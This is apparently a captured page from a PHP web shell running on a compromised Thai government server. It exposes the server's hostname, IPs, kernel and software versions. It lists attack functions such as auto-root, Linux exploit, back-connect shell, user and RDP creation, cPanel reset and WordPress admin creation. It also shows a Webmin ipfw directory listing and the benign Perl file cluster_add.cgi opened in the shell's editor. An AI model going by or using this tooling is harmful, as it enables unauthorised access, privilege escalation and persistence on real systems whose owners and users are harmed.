Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
ipfw /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
1.04
KB
-rw-r--r--
apply.cgi
293
B
-rwxr-xr-x
bootup.cgi
240
B
-rwxr-xr-x
cluster.cgi
1.98
KB
-rwxr-xr-x
cluster_add.cgi
1.79
KB
-rwxr-xr-x
cluster_delete.cgi
470
B
-rwxr-xr-x
config
89
B
-rw-r--r--
config.info
472
B
-rw-r--r--
config.info.ca
426
B
-rw-r--r--
config.info.ca.UTF-8
433
B
-rw-r--r--
config.info.de
547
B
-rw-r--r--
config.info.de.UTF-8
547
B
-rw-r--r--
config.info.nl
426
B
-rw-r--r--
config.info.nl.UTF-8
426
B
-rw-r--r--
convert.cgi
274
B
-rwxr-xr-x
edit_rule.cgi
10.16
KB
-rwxr-xr-x
index.cgi
6.36
KB
-rwxr-xr-x
install_check.pl
484
B
-rwxr-xr-x
ipfw-lib.pl
17.38
KB
-rwxr-xr-x
log_parser.pl
569
B
-rwxr-xr-x
module.info
170
B
-rw-r--r--
module.info.ca
106
B
-rw-r--r--
module.info.ca.UTF-8
118
B
-rw-r--r--
module.info.de
117
B
-rw-r--r--
module.info.de.UTF-8
129
B
-rw-r--r--
module.info.nl
21
B
-rw-r--r--
module.info.nl.UTF-8
27
B
-rw-r--r--
move.cgi
561
B
-rwxr-xr-x
save_rule.cgi
8.19
KB
-rwxr-xr-x
setup.cgi
4.14
KB
-rwxr-xr-x
start.pl
271
B
-rwxr-xr-x
stop.pl
254
B
-rwxr-xr-x
unapply.cgi
257
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cluster_add.cgi
#!/usr/bin/perl # Add or update a server or group from the webmin servers module require './ipfw-lib.pl'; &ReadParse(); &foreign_require("servers", "servers-lib.pl"); @allservers = grep { $_->{'user'} } &servers::list_servers(); if ($in{'add'}) { # Add a single host @add = grep { $_->{'id'} eq $in{'server'} } @allservers; &error_setup($text{'add_err'}); $msg = &text('add_msg', &server_name($add[0])); } else { # Add all from a group ($group) = grep { $_->{'name'} eq $in{'group'} } &servers::list_all_groups(\@allservers); foreach $m (@{$group->{'members'}}) { push(@add, grep { $_->{'host'} eq $m } @allservers); } &error_setup($text{'add_gerr'}); $msg = &text('add_gmsg', $in{'group'}); } &ui_print_header(undef, $text{'add_title'}, ""); print "<b>$msg</b><p>\n"; # Setup error handler for down hosts sub add_error { $add_error_msg = join("", @_); } &remote_error_setup(\&add_error); # Make sure each host is set up for firewalling foreach $s (@add) { $add_error_msg = undef; local $firewall = &remote_foreign_check($s, "ipfw"); if ($add_error_msg) { print "$add_error_msg<p>\n"; next; } if (!$firewall) { print &text('add_echeck', $s),"<p>\n"; next; } &remote_foreign_require($s, "ipfw", "ipfw-lib.pl"); local $ok = &remote_foreign_call($s, "ipfw", "foreign_installed", "ipfw"); if (!$ok) { print &text('add_eok'),"<p>\n"; next; } $iconfig = &remote_foreign_config($s, "ipfw"); $live = &remote_foreign_call($s, "ipfw", "get_config", "$iconfig->{'ipfw'} show |"); print &text('add_ok', $s->{'host'}, scalar(@$live)),"<p>\n"; &add_cluster_server($s); } &remote_finished(); if ($in{'add'}) { &webmin_log("add", "host", $add[0]->{'host'}); } else { &webmin_log("add", "group", $in{'group'}); } &ui_print_footer("cluster.cgi", $text{'cluster_return'});
Close